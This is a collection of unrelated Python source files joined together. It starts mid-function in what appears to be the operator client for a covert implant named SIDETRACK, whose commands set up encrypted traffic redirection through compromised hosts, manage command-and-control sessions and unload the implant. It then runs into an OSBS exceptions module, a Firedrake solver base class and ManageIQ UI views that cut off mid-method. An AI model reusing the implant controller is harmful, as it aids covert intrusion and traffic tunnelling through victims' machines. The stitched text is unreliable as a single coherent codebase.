printOut = res[1]
for i in range(1,4):
sd = self.GetSection(sec, i)
if sd[0] == 0:
return (0, printOut)
printOut = printOut + sd[1]
else:
return self.GetRule(sec,ext)
else:
if sec == -1:
return self.GetRule(rule)
else: # Rule != 0 and sec != -1
return self.GetRule(rule,sec)
return (1,printOut)
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "rediradd"
self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
self.op = 0x23L
def parseProto(self,proto):
origproto = proto
if type(proto) == type ('a'):
proto = string.upper(proto)[:1]
if proto == "T":
proto = 6
elif proto == "U":
proto = 17
elif proto == "I":
proto = 1
elif proto == "A":
proto = 0
else:
raise ValueError, origproto
return proto
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,-1,-1
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
ports[0] = -1
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
ports[1] = -1
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,protocol,attacker,target,
opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
opt6=None,opt7=None,opt8=None,opt9=None,first=1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg,0)
optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
allProtoAT = 0
allProtoTA = 0
allRedir = 0
ttl_reset = 1
ttl_mod = 0
munge = 1
encrypt = 0
afix = 1
tfix = 1
ident = 0
seq = 0
insert = 0
samesum = 0
longevity = 14400
conn_to = 14400
cmd = None
localredir = 0
if first:
munge = 0
encrypt = 1
protocol = self.parseProto(protocol)
if protocol == 0:
allRedir = 1
host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
if host != None:
hpn = host.implant.parent.name
myname = host.name
attacker = re.sub(myname,hpn,attacker)
cmd = host.GetCommand('rediradd')
res = cmd.run(protocol,attacker,\
"%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
if res[0] == 0:
return res
if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
A_ip = struct.pack("!L",res[2])
if SA_port == -1 and T_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port != -1 and T_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port == -1 and A_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port != -1 and A_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port == -1 and T_port == -1:
allProtoAT = 1
SA_port = 0
T_port = 0
if ST_port == -1 and A_port == -1:
allProtoTA = 1
ST_port = 0
A_port = 0
# Parse the args
i=0
while i < len(optList):
if optList[i] == None:
break
elif string.upper(optList[i])[:3] == '-TT':
i = i+1
if type(optList[i]) == type(1):
ttl_mod = optList[i]
if optList[i] < 0:
ttl_reset = 0
else:
ttl_reset = 1
elif string.upper(optList[i])[:1] == 'R':
ttl_mod = 0
ttl_reset = 1
elif optList[i][0] == '+' or optList[i][0] == '-':
ttl_mod = eval(optList[i])
ttl_reset = 0
else:
raise ValueError, optList[i]
#if ttl_reset == 0:
# ttl_mod = struct.pack("!H",ttl_mod)
#else:
# ttl_mod = struct.pack("!h",ttl_mod)
elif string.upper(optList[i])[:2] == '-I':
i = i+1
insert = optList[i]
elif string.upper(optList[i])[:2] == '-L':
i = i+1
longevity = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-C':
i = i+1
conn_to = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-N':
munge = 0
encrypt = 0
elif string.upper(optList[i])[:2] == '-E':
encrypt = 1
elif string.upper(optList[i])[:2] == '-A':
afix = 0
elif string.upper(optList[i])[:3] == '-TF':
tfix = 0
elif string.upper(optList[i])[:2] == '-S':
samesum = 1
else:
raise ValueError, optList[i]
i = i + 1
if T_ip == self.ConvertIP(self.implant.session.target.ip):
encrypt = 0
munge = 0
localredir = 1
flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
| encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
| allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
rd = crypto.GetRandom()
if localredir == 0:
ident = struct.unpack("!H",rd[0:2])[0]
if munge:
munge = struct.unpack("!L",rd[2:6])[0]
if munge & 1L == 0:
munge = munge + 1
if munge & 0xffL == 1:
munge = munge + 10
if protocol == 6 and localredir == 0 and encrypt:
seq = struct.unpack("!L", rd[22:26])[0]
if encrypt:
encrypt = struct.unpack("!LLLL",rd[6:22])
else:
encrypt = (0,0,0,0)
base.db(2, seq)
base.db(2, ident)
self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
ident,seq,munge,encrypt,ttl_mod,flags,\
A_port,SA_port,T_port,ST_port)
ruleRes = self.redir.add()
if ruleRes[0] and cmd != None:
if cmd.redir != None:
cmd.redir.next = self.redir
self.redir.prev = cmd.redir
return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirlist"
self.usage = "redirlist [rule]"
self.info = "List redirect entries."
self.op = 0x24L
def parseReturn(self):
self.ret, self.rule, self.longevity, self.conn_to, \
self.A_ip, self.T_ip, self.flags = \
struct.unpack("!LLLLLLH",self.data[:26])
self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
self.A_port, self.SA_port, self.T_port, self.ST_port, \
self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
self.A_ip = self.ConvertToDot(self.A_ip)
self.T_ip = self.ConvertToDot(self.T_ip)
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
if self.protocol == 1:
self.protocol = "ICMP"
elif self.protocol == 6:
self.protocol = "TCP"
elif self.protocol == 17:
self.protocol = "UDP"
elif self.protocol == 0:
self.protocol = "ALL"
else:
self.protocol = eval("'%d'" % (self.protocol))
if (self.flags & 0x1L):
self.active = "ACTIVE"
else:
self.active = "INACTIVE"
self.opts = ''
if not (self.flags & 0x2L):
self.opts = self.opts + '-afix '
if not (self.flags & 0x4L):
self.opts = self.opts + '-tfix '
if (self.flags & 0x400L):
self.opts = self.opts + '-samesum '
if self.flags & 0x8L:
if self.ttl_mod == 0:
self.opts = self.opts + '-ttl reset '
else:
self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
else:
if self.ttl_mod > 127:
self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
else:
self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
if not (self.flags & 0x30L):
self.opts = self.opts + '-nocrypto '
def outputPorts(self,attacker,flags,ip,lport,rport):
if flags & 0x40 or flags & 0x180 == 0x180:
return ip
if attacker and flags & 0x80:
rport = '*'
if attacker and flags & 0x100:
lport = '*'
if not attacker and flags & 0x80:
lport = '*'
if not attacker and flags & 0x100:
rport = '*'
if type(lport) != type('*'):
lport = '%d' %(lport)
if type(rport) != type('*'):
rport = '%d' %(rport)
return '%s:%s/%s' % (ip,lport,rport)
def outputCurrent(self):
res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
(self.rule,self.active,\
self.TimeConvert(self.conn_to),self.longevity)
res = res + ' %s %s %s %s\n' % \
(self.protocol,
self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
self.opts)
res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
return (1, res)
def listOne(self,rule):
self.data = struct.pack("!LL",rule,0)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def listAll(self):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LL",0,self.rule)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1, "No rules to list")
else:
return (1, out)
def run(self,rule=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if rule == None:
res = self.listAll()
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirset"
self.usage = "redirset <rule|all> <active|inactive>"
self.info = "Set a redirect rule as being active or inactive."
self.op = 0x25L
def run(self, rule, status):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
if string.upper(status[:1]) == 'A':
status = 1
elif string.upper(status[:1]) == 'I':
status = 0
i=0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].set(status)
if res[0] == 0:
return res
elif rule != 0:
break
i = i + 1
base.db(3,res[1])
if i == len(self.implant.rules) and rule != 0:
return (0, "Rule does not exist")
else:
return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connrm"
self.usage = "connrm <rule|all>"
self.info = "Remove a connection entry (or all connection entries)"
self.op = 0x28L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x28L and self.res == 0x1L:
return (1, "Connection(s) removed successfully")
else:
return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connlist"
self.usage = "connlist [-c <rule> | -r <redir>]"
self.info = "Lists a (or all) connection rules"
self.op = 0x27L
def convertState(self,state):
if state == 0:
return "INIT"
elif state == 1:
return "SYN_SENT"
elif state == 2:
return "SYN_RCVD"
elif state == 3:
return "SYN_ACK_RCVD"
elif state == 4:
return "SYN_ACK_SENT"
elif state == 5:
return "ESTABLISHED"
elif state == 6:
return "FIN_SENT"
def parseReturn(self):
self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
self.STip, self.Aport, self.SAport, self.Tport, self.STport \
= struct.unpack("!LLLLLLLHHHH",self.data[20:56])
self.leftState = ''
self.rightState = ''
if self.protocol == 6:
self.protocol = "TCP"
if sender == 1:
self.leftState = self.convertState(sendstate)
self.rightState = self.convertState(recvstate)
else:
self.leftState = self.convertState(recvstate)
self.rightState = self.convertState(sendstate)
elif self.protocol == 17:
self.protocol = "UDP"
else:
self.protocol = '%d' %(self.protocol)
def outputCurrent(self):
res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
(self.rule,self.protocol,self.redir,
time.ctime(self.last+self.implant.timediff)[4:],
self.ConvertToDot(self.Aip),self.Aport,
self.leftState,self.at_cnt,
self.ConvertToDot(self.SAip),self.SAport,
self.ConvertToDot(self.STip),self.STport,
self.rightState,self.ta_cnt,
self.ConvertToDot(self.Tip),self.Tport)
return (1,res)
def listAll(self,redir):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LLL",0,self.rule,redir)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1,"No connections to list")
else:
return (1,out)
def listOne(self,rule):
self.data = struct.pack("!LLL",rule,0,0)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def run(self, option=None, value=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
rule = 0
redir = 0
if option != None:
if option == '-c':
rule = value
elif option == '-r':
redir = value
else:
raise TypeError, option
if rule == 0:
res = self.listAll(redir)
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirrm"
self.usage = "redirrm <rule|all>"
self.info = "Remove a redirect rule (or all redirect rules)"
self.op = 0x26L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
removed = 0
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
i = 0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].remove()
if res[0] == 0:
return res
removed = 1
i = i - 1
i = i + 1
if removed == 0 or rule == 0:
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
return (1, "Rule(s) removed successfully")
else:
return (0, "Error removing rule(s)")
else:
return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "cclist"
self.usage = "cclist"
self.info = "List all of the command and control sessions"
self.op = 0x29L
def parseReturn(self):
self.more,self.rule,self.longevity,self.srcip,self.dstip,\
self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
if self.more & 2L:
self.current = "(CURRENT) "
else:
self.current = ""
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
self.srcip = self.ConvertToDot(self.srcip)
self.dstip = self.ConvertToDot(self.dstip)
def displayCurrent(self):
# STUB: Make this better!
if self.rule == 0xffffffffL:
return ""
res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
(self.rule,self.current,self.srcip,self.srcport,\
self.dstip,self.dstport,self.longevity)
return res
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
res = ""
last = 0L
self.more = 1
while self.more & 1L:
self.data = struct.pack("!L",last)
self.Query()
if self.op == 0x29L and self.res == 0x1L:
self.parseReturn()
res = self.displayCurrent() + res
last = self.rule
else:
return (0, "Error getting CC rules")
return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "ccremove"
self.usage = "ccremove <rule>"
self.info = "Remove a command and control session (see also: done)"
self.op = 0x2aL
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x2aL and self.res == 0x1L:
return (1, "Session removed successfully")
else:
return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "stunload"
self.usage = "stunload <magic>"
self.info = "Remove SIDETRACK from the target"
self.op = 0x30L
def run(self, magic):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",magic);
self.Query()
if self.op == 0x30L and self.res == 0x1L:
return (1, "SIDETRACK successfully removed from target")
else:
return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
A_port, SA_port, T_port, ST_port):
SIDECMD.__init__(self)
self.protocol = cmd.protocol
self.implant = cmd.implant
self.session = cmd.implant.session
self.target = cmd.implant.session.target
self.longevity = longevity
self.nextRule = next
self.connection_timeout = connection_timeout
self.proto = protocol
self.A_ip = A_ip
self.T_ip = T_ip
self.ident = ident
self.seq = seq
self.munge = munge
self.crypto_key = crypto_key
self.ttl_mod = ttl_mod
self.flags = flags
self.A_port = A_port
self.SA_port = SA_port
self.T_port = T_port
self.ST_port = ST_port
self.added = 0
self.localRuleNum = None
self.remoteRuleNum = None
self.prev = None
self.next = None
self.ccPassthru = None
def remove(self,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if self.ccPassthru != None:
cmd = self.ccPassthru.GetCommand('done')
cmd.run()
if direction != 1 and self.next != None:
res = self.next.remove(2)
if res[0] == 0:
return (res[0], "Rule could not be removed: " + res[1])
self.next = None
if self.remoteRuleNum != None:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
base.redir.delete(self.localRuleNum)
self.added = 0
self.localRuleNum = None
self.implant.rules.remove(self)
if direction != 2 and self.prev != None:
res = self.prev.remove(1)
if res[0] == 0:
return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d removed"%(self.remoteRuleNum))
else:
return (0, "Rule could not be removed")
else:
base.redir.delete(self.localRuleNum)
return (1, "Local rule removed")
def set(self,value,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if direction != 1 and self.next != None:
res = self.next.set(value,2)
if res[0] == 0:
return(res[0], "Rule could not be set: " + res[1])
if self.remoteRuleNum:
self.op = 0x25L
self.data = struct.pack("!LH",self.remoteRuleNum, value)
self.Query()
if self.op == 0x25L and self.res == 0x1L:
base.redir.set(self.localRuleNum, value)
if direction != 2 and self.prev != None:
res = self.prev.set(value,1)
if res[0] == 0:
return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d set"%(self.remoteRuleNum))
else:
return (0, "Rule could not be set")
else:
base.redir.set(self.localRuleNum, value)
return (1, "Local rule set")
def add(self, addremote=1):
if self.added == 1:
return (0, "Rule already exists", 0)
AT_ip = 0
if addremote:
self.op = 0x23L
self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
self.connection_timeout)
self.data = self.data + self.A_ip + self.T_ip
self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
(self.ttl_mod << 8 | self.proto), self.munge,\
self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
self.crypto_key[3], self.ident, 0, self.A_port, \
self.SA_port, self.T_port, self.ST_port, self.seq)
self.Query()
if self.op == 0x23L and self.res == 0x01L:
self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
AT_ip = struct.unpack("!L", self.data[4:8])[0]
self.ST_ip = self.data[4:8]
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
self.remoteRuleNum = None
return (0, "Local rule could not be added", AT_ip)
else:
return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
self.localRuleNum = res
self.added = 1
self.implant.rules.append(self)
return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
else:
return (0, "Remote rule could not be added", AT_ip)
else:
self.remoteRuleNum = None
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
return (0, "Local rule could not be added", 0)
self.added = 1
self.localRuleNum = res
return (1, "Local rule added", 0)
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Exceptions raised by OSBS
"""
from traceback import format_tb
class OsbsException(Exception):
def __init__(self, message=None, cause=None, traceback=None):
if message is None and cause is not None:
message = repr(cause)
super(OsbsException, self).__init__(message)
self.message = message
self.cause = cause
self.traceback = traceback
def __str__(self):
if self.cause and self.traceback and not hasattr(self, '__context__'):
return ("%s\n\n" % self.message +
"Original traceback (most recent call last):\n" +
"".join(format_tb(self.traceback)) +
"%r" % self.cause)
else:
return super(OsbsException, self).__str__()
def __repr__(self):
if self.cause and not hasattr(self, '__context__'):
return "OsbsException caused by %r" % self.cause
else:
return super(OsbsException, self).__repr__()
class OsbsResponseException(OsbsException):
""" OpenShift didn't respond with OK (200) status """
def __init__(self, message, status_code, *args, **kwargs):
super(OsbsResponseException, self).__init__(message, *args, **kwargs)
self.status_code = status_code
class OsbsNetworkException(OsbsException):
def __init__(self, url, message, status_code, *args, **kwargs):
super(OsbsNetworkException, self).__init__(message, *args, **kwargs)
self.url = url
self.status_code = status_code
class OsbsValidationException(OsbsException):
pass
|
from firedrake import *
from firedrake.utils import cached_property
from abc import ABCMeta, abstractproperty
class Problem(object):
__metaclass__ = ABCMeta
def __init__(self, N=None, degree=None, dimension=None,
quadrilaterals=False):
super(Problem, self).__init__()
self.degree = degree
self.N = N
self.dim = dimension
self.quads = quadrilaterals
@property
def comm(self):
return self.mesh.comm
@cached_property
def mesh(self):
if self.dim == 2:
return UnitSquareMesh(self.N, self.N, quadrilateral=self.quads)
else:
assert self.dim == 3
if self.quads:
base = UnitSquareMesh(self.N, self.N, quadrilateral=self.quads)
return ExtrudedMesh(base, self.N, layer_height=1.0/self.N)
else:
return UnitCubeMesh(self.N, self.N, self.N)
@abstractproperty
def name(self):
pass
@abstractproperty
def function_space(self):
pass
@abstractproperty
def u(self):
pass
@abstractproperty
def a(self):
pass
@abstractproperty
def L(self):
pass
@abstractproperty
def bcs(self):
pass
@cached_property
def analytic_solution(self):
x = SpatialCoordinate(self.mesh)
if self.dim == 2:
return exp(sin(pi*x[0])*sin(pi*x[1]))
else:
assert self.dim == 3
return exp(sin(pi*x[0])*sin(pi*x[1])*sin(pi*x[2]))
def solver(self, parameters=None):
# For the rebuilding of the Jacobian to record assembly time
problem = LinearVariationalProblem(self.a, self.L, self.u,
bcs=self.bcs,
constant_jacobian=False)
solver = LinearVariationalSolver(problem, solver_parameters=parameters)
return solver
@abstractproperty
def output(self):
pass
@abstractproperty
def err(self):
pass
@abstractproperty
def true_err(self):
pass
@abstractproperty
def sol(self):
pass
|
# -*- coding: utf-8 -*-
from widgetastic.utils import VersionPick, Version
from widgetastic.widget import View, Text, ConditionalSwitchableView
from widgetastic_manageiq import PaginationPane
from widgetastic_patternfly import Dropdown, BootstrapSelect, FlashMessages
from cfme.base.login import BaseLoggedInPage
from widgetastic_manageiq import (BreadCrumb,
SummaryTable,
Button,
TimelinesView,
DetailsToolBarViewSelector,
ItemsToolBarViewSelector,
Checkbox,
Input,
Table,
BaseEntitiesView,
DynaTree,
BootstrapTreeview,
ProviderEntity,
BaseNonInteractiveEntitiesView)
from cfme.common.host_views import HostEntitiesView
class ProviderDetailsToolBar(View):
"""
represents provider toolbar and its controls
"""
monitoring = Dropdown(text='Monitoring')
configuration = Dropdown(text='Configuration')
reload = Button(title='Reload Current Display')
policy = Dropdown(text='Policy')
authentication = Dropdown(text='Authentication')
view_selector = View.nested(DetailsToolBarViewSelector)
class ProviderDetailsView(BaseLoggedInPage):
"""
main Details page
"""
title = Text('//div[@id="main-content"]//h1')
breadcrumb = BreadCrumb(locator='//ol[@class="breadcrumb"]')
flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
'contains(@class, "flash_text_div")]')
toolbar = View.nested(ProviderDetailsToolBar)
contents = ConditionalSwitchableView(reference='toolbar.view_selector',
ignore_bad_reference=True)
@contents.register('Summary View', default=True)
class ProviderDetailsSummaryView(View):
"""
represents Details page when it is switched to Summary aka Tables view
"""
properties = SummaryTable(title="Properties")
status = SummaryTable(title="Status")
relationships = SummaryTable(title="Relationships")
overview = SummaryTable(title="Overview")
smart_management = SummaryTable(title="Smart Management")
@contents.register('Dashboard View')
class ProviderDetailsDashboardView(View):
"""
represents Details page when it is switched to Dashboard aka Widgets view
"""
# todo: need to develop this page
pass
@property
def is_displayed(self):
if (not self.toolbar.view_selector.is_displayed or
self.toolbar.view_selector.selected == 'Summary View'):
subtitle = 'Summary'
else:
subtitle = 'Dashboard'
title = '{name} ({subtitle})'.format(name=self.context['object'].name,
subtitle=subtitle)
return (self.logged_in_as_current_user and
self.breadcrumb.is_displayed and
self.breadcrumb.active_location == title)
class InfraProviderDetailsView(ProviderDetailsView):
"""
Infra Details page
"""
@property
def is_displayed(self):
return (super(InfraProviderDetailsView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'])
class CloudProviderDetailsView(ProviderDetailsView):
"""
Cloud Details page
"""
@property
def is_displayed(self):
